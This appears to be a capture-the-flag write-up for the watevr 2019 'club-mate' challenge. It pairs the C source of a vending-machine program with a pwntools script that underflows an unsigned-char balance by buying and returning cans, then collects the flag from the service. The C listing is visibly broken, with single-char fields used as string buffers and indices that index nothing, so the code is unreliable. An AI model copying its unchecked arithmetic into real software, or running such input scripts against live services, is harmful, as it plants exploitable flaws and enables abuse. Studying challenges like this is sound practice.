watevr_2019_pwn_club-mate
源码:#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#include <signal.h>
/*
 * One vending-machine slot as shown on this page: three pieces of ASCII art
 * (a1, a2, a3) and a flag saying whether the can is still in the machine.
 *
 * NOTE(review): a1/a2/a3 are declared as single `char` here, yet main()
 * passes them to strcpy() and printf("%s"), which need a char buffer or
 * pointer. The array suffixes were presumably lost when the listing was
 * extracted; confirm the real field sizes against the original source
 * before reasoning about how much each strcpy() may write.
 */
struct club_mate {
char a1;
char a2;
char a3;
bool isInMachine; // true while the can has not been sold
};
/*
 * Win routine: writes the flag and a congratulation line to stdout, then
 * terminates the process with status 0. It never returns to its caller.
 *
 * The flag is a string literal compiled into the program, so anyone who holds
 * a copy of the binary can read it without running it; a deployed service
 * would normally load the secret from outside the executable.
 */
void printFlag(){
    static const char flag_line[] =
        "watevr{P4nTa_M33333333Ra_youtube.com/watch?v=QGoEYcRmzq0}\n";
    static const char praise_line[] =
        "Good Job saving saving the planet and staying rich at the same time!\n";

    fputs(flag_line, stdout);
    fputs(praise_line, stdout);
    exit(0);
}
/*
 * Report whether a can is still in the machine.
 *
 * As written on this page the function receives a single struct by value and
 * tests the same isInMachine flag on each of its 15 passes, so the result is
 * simply that flag.
 * NOTE(review): the loop counter is never used, which suggests a subscript
 * (one test per slot) was lost in extraction; confirm against the original.
 */
bool hazCanInMachine(struct club_mate bottles){
    int slot = 0;

    while (slot < 15) {
        if (bottles.isInMachine) {
            return true;
        }
        slot++;
    }
    return false;
}
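/*
 * SIGALRM handler: ends the process once the alarm armed in main() fires.
 *
 * Calls _exit() instead of exit(). exit() runs atexit handlers and flushes
 * stdio, neither of which is async-signal-safe; if the signal lands while the
 * main loop is inside printf() or scanf(), exit() can deadlock or corrupt
 * stream state (CERT SIG30-C). _exit() is async-signal-safe. The trade-off is
 * that output still sitting in a stdio buffer at timeout is discarded.
 *
 * @param sign  signal number delivered by the kernel; unused.
 */
void sig(int sign){
    (void)sign; /* required by the handler signature only */
    _exit(0);
}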
/*
 * Vending-machine session loop. It stocks the machine, then repeatedly draws
 * it, reads a can number, and either sells the can for $4 or offers to take
 * it back. printFlag() is called when the balance check at the top of the
 * outer loop passes. A 40-second SIGALRM ends the session.
 *
 * NOTE(review): this listing appears to have lost array sizes and subscripts
 * in extraction (`char can;` is used as a string buffer, and `i` and `bottle`
 * never index anything). The comments below describe the statements as shown;
 * confirm buffer sizes and indexing against the original source.
 */
int main()
{
// Hard session limit: sig() terminates the process after 40 seconds.
signal(SIGALRM, sig);
alarm(40);
// The balance is 8 bits wide, so every store to it is reduced modulo 256.
unsigned char money = 255; //mcDonald's hired you as their *national* security expert and now you are the richest mcDonald's employee!
struct club_mate bottles;
char can;
int i = 0;
int tmpVar = 18;
while(true) {
// Win check. Both operands are promoted to int, so this holds only when
// money is strictly greater than 250 + tmpVar.
if(250 + tmpVar < money) {
printFlag();
}
// Stock the machine. Runs 15 times on the first pass only (i is never reset)
// and, as a side effect, lowers tmpVar from 18 to 3.
while(i < 15) {
strcpy(bottles.a1, "\033[0;33m /\\\033[0m");
strcpy(bottles.a2, "\033[0;33m ||\033[0m");
strcpy(bottles.a3, "\033[0;33m ¯¯\033[0m");
bottles.isInMachine = true;
tmpVar--;
i += 1;
}
// One transaction per iteration, for as long as a can is left to sell.
while(hazCanInMachine(bottles)) {
// This `can` shadows the one declared at the top of main().
char can;
strcpy(can, "");
char payment;
strcpy(payment, "");
printf("%s", "You have been pwning all day and it has made you really thirsty!\nLucky for you i just finished building a club-mate vending machine!\n");
printf("balance: %i\n", money);
// Draw the machine front from the slot art.
printf("%s", ".---------------.\n");
printf("%s","|");
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s","|\n");
printf("%s","| |\n");
printf("%s","|");
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s","|\n");
printf("%s","| |\n");
printf("%s","|");
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s", "|\n");
printf("%s", "| |\n");
printf("%s", "¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\n");
printf("%s", "Enter which club-mate you want to buy/return: "); //0-14
fflush(stdout);
// scanf()'s return value is not checked here or below, so EOF or a read error
// goes unnoticed and the loop carries on with whatever the buffer holds.
scanf("%2s", can);
// The parsed number is not checked against the 0-14 range the prompt comment
// documents (two characters can also spell a negative value), and it is not
// used again in the listing as shown.
// NOTE(review): if the original indexes the slots with it, a bounds check
// belongs here.
int bottle = atoi(can);
// Snapshot of the balance before this transaction.
int securityCheck = money;
if(bottles.isInMachine)
{
printf("%s", "the ");
printf("%s", can);
printf("%s\n", " it is!");
printf("%s\n", "That will be $4");
//this time you actually have money with you!
fflush(stdout);
scanf("%2s", payment);
if(!strcmp("$4", payment))
{
printf("%s\n", "Thanks, here is your club-mate!");
strcpy(bottles.a1, " ");
strcpy(bottles.a2, " ");
strcpy(bottles.a3, " ");
bottles.isInMachine = false;
// The sale is not refused when money < 4. Because money is an unsigned char,
// spending past zero wraps around to a high balance instead of failing.
// Checking the balance before deducting closes this.
money -= 4;
}
}
// Same condition as the `if` above, so this branch cannot run as written.
// NOTE(review): the message reads like the "wrong payment" case; check in the
// original whether it belongs to the inner strcmp() test instead.
else if(bottles.isInMachine)
{
printf("%s", "I asked for $4 not ");
printf("%s", payment);
printf("\n");
}
else
{
// The can is not in the machine: offer to take it back.
char returnCan;
printf("Would you like to return can number ");
printf("%s", can);
printf("%s", "?\n");
fflush(stdout);
scanf("%16s", returnCan);
if(!strcmp(returnCan, "yes") || !strcmp(returnCan, "Yes"))
{
bottles.isInMachine = true;
strcpy(bottles.a1, "\033[0;33m /\\\033[0m");
strcpy(bottles.a2, "\033[0;33m ||\033[0m");
strcpy(bottles.a3, "\033[0;33m ¯¯\033[0m");
// Bitwise adder: ~(~a | ~b) equals a & b (the carry bits) and a ^ b is the
// sum without carry, so this loop adds tmpVar to money. Each store to money
// is truncated to 8 bits. The refund credited is therefore tmpVar, not the
// $4 purchase price.
while(tmpVar != 0) {
int calc = ~(~money | ~tmpVar);
money = money ^ tmpVar;
tmpVar = calc << 1;
}
// tmpVar becomes the size of the balance change made by this refund. It is
// also the value used in the win check at the top of the outer loop.
tmpVar = abs(securityCheck-money);
}
}
}
}
return 0;
}
exp:
# The goal is to get the balance back to 255 while also taking all the club-mates. The money is a small unsigned integer (unsigned char in the source), so it wraps around to 255 when it would go negative.
# So the goal is to reach -1 dollars while grabbing the last bottle.
# That means having exactly $59, with all bottles returned to the machine, before grabbing them all (since 4*15 = 60 and we want to end at -1).
import subprocess, time
from pwn import *
# Local model of the service state, used only to decide how many input lines
# to generate: the starting balance and the highest can number to request.
money, bottles = 255, 15
# Accumulated input that will be sent to the service, one answer per line.
exploit = ""
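def buy(bottle):
    """Return the input for one purchase: the can number, then "$4".

    The listing on the page lost its indentation; the body is restored here
    and the two-element list join is replaced by a plain concatenation.

    bottle: can number; converted with str().
    Returns the text "<bottle>\\n$4\\n".
    """
    return str(bottle) + "\n$4\n"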
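def returnB(bottle):
    """Return the input for handing a can back: the can number, then "yes".

    The listing on the page lost its indentation; the body is restored here
    and the two-element list join is replaced by a plain concatenation.

    bottle: can number; converted with str().
    Returns the text "<bottle>\\nyes\\n".
    """
    return str(bottle) + "\nyes\n"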
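def validate(ip, port, exploit):
    """Send the prepared input to the service and return everything it replied.

    ip, port: address of the service under test.
    exploit:  newline-separated input; one line is sent per prompt.
    Returns the collected output as text, ending at the first "Good".

    Changes from the listing on the page:
    - the connection is closed on every path (it was never closed before);
    - received bytes are decoded rather than wrapped in str(), which on
      Python 3 yields the "b'...'" repr and can hide a flag that contains
      characters the repr escapes.
    The loop extent is inferred, because the page lost its indentation:
    sendline/recvline run once per line and recvuntil runs once afterwards.
    """
    # pipe payload to server
    r = remote(ip, port)
    try:
        message = ""
        for line in exploit.split("\n"):
            r.sendline(line.encode())
            message += r.recvline().decode(errors="replace")
        message += r.recvuntil(b"Good").decode(errors="replace")
        return message
    finally:
        r.close()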
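# Service check: build the input sequence, run it against the service, and
# report whether the expected flag appears in the reply (exit status 0 or 1).
# The block structure is restored here; the page lost its indentation.
try:
    # Buy and return can 0 until the local model of the balance reads 59;
    # each round trip is modelled as costing 1.
    while money != 59:
        exploit += buy(0)
        exploit += returnB(0)
        money -= 1
    # Then request every can, counting down from the highest number to 0.
    while bottles != -1:
        exploit += buy(bottles)
        bottles -= 1
    flag = input("flag: ").replace("\n", "")
    if not flag:
        # "" is a substring of every string, so an empty flag would make the
        # check below report success no matter what the service answered.
        raise ValueError("empty flag")
    # Split on the last colon only, so a host containing colons still parses.
    ip, port = input("service: ").rsplit(":", 1)
    res = validate(str(ip), int(port), exploit)
    if flag in res:
        print("success")
        exit(0)
    else:
        print("fail")
        exit(1)
except Exception as e:
    # exit() raises SystemExit, which is not an Exception subclass, so the
    # exit calls above are not caught here.
    print("fail due to ")
    print(e)
    exit(1)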